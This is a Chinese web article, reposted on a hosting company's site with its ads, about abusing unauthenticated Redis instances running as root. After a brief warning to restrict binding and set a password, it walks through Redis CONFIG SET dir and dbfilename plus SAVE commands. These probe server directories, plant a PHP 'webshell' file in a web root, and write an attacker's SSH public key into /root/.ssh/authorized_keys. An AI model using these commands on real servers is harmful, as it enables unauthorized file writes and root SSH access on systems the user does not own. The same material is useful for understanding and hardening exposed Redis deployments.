在許多服務器上部署的Redis是采用Root權限進行啟動進而可以利用這個Root做許多超級權限的事情。由于REDIS是沒有嚴格授權管理機制大家在部署一定不要設置為0.0.0.0以及最好使用requirepass(雖然是明文但是至少增加一定的難度)。

創(chuàng)新互聯(lián)公司專注于竹山企業(yè)網站建設,成都響應式網站建設,商城網站制作。竹山網站建設公司,為竹山等地區(qū)提供建站服務。全流程按需網站開發(fā)，專業(yè)設計，全程項目跟蹤，創(chuàng)新互聯(lián)公司專業(yè)和態(tài)度為您提供的服務

本文主要利用的是redis提供的configsave兩個命令來完成我們的HACK功能便捷的工具用歪了就成了禍害。

簡單介紹幾個有用的命令

config set dir $path:

這個命令是配置為了指定redis的“工作路徑”之后生成的RDB和AOF文件都會存儲在這里

dbfilename $name:

RDB文件名默認為“dump.rdb”

save:

將內存里的數據進行持久化操作

它們結合在一起就可以實現(xiàn)如下好玩的功能

1.指定文件夾是否存在

config set dir /home/bob

如果是返回(error) ERR Changing directory: No such file or directory表示沒有該文件夾。

如果返回OK表示服務器上有這個文件夾并且已經將其設置為內存快照保存的文件夾

2.webshell最好使用之前進行flushdb,或者flushall清空內存里數據

1.config set dir /opt/web/www #設定網站的目錄
2.config set dbfilename test.php #設定將要保存的文件名
3.set "<?php phpinfo();?>" "" #我們的webshell
4.save  #將內存持久化到test.php

3.訪問信任

1.cat ~/.ssh/id_rsa.pub > ~/foo.txt
2.cat ~/foo.txt|redis -x set hack #將foo.txt里的內容保存為一個KEY為hack的字符串
3.config set dir /root/.ssh/ #設定root的.ssh文件夾
4.config set dbfilename authorized_keys
5.save

另外有需要云服務器可以了解下創(chuàng)新互聯(lián)scvps.cn，海內外云服務器15元起步，三天無理由+7*72小時售后在線，公司持有idc許可證，提供“云服務器、裸金屬服務器、高防服務器、香港服務器、美國服務器、虛擬主機、免備案服務器”等云主機租用服務以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡單易用、服務可用性高、性價比高”等特點與優(yōu)勢，專為企業(yè)上云打造定制，能夠滿足用戶豐富、多元化的應用場景需求。

分享題目：關于Redis的一些好玩東西-創(chuàng)新互聯(lián)
文章來源：http://aaarwkj.com/article34/jeope.html

成都網站建設公司_創(chuàng)新互聯(lián)，為您提供網站排名、網頁設計公司、外貿建站、品牌網站制作、自適應網站、動態(tài)網站

廣告

聲明：本網站發(fā)布的內容（圖片、視頻和文字）以用戶投稿、用戶轉載內容為主，如果涉及侵權請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內容未經允許不得轉載，或轉載時需注明來源： 創(chuàng)新互聯(lián)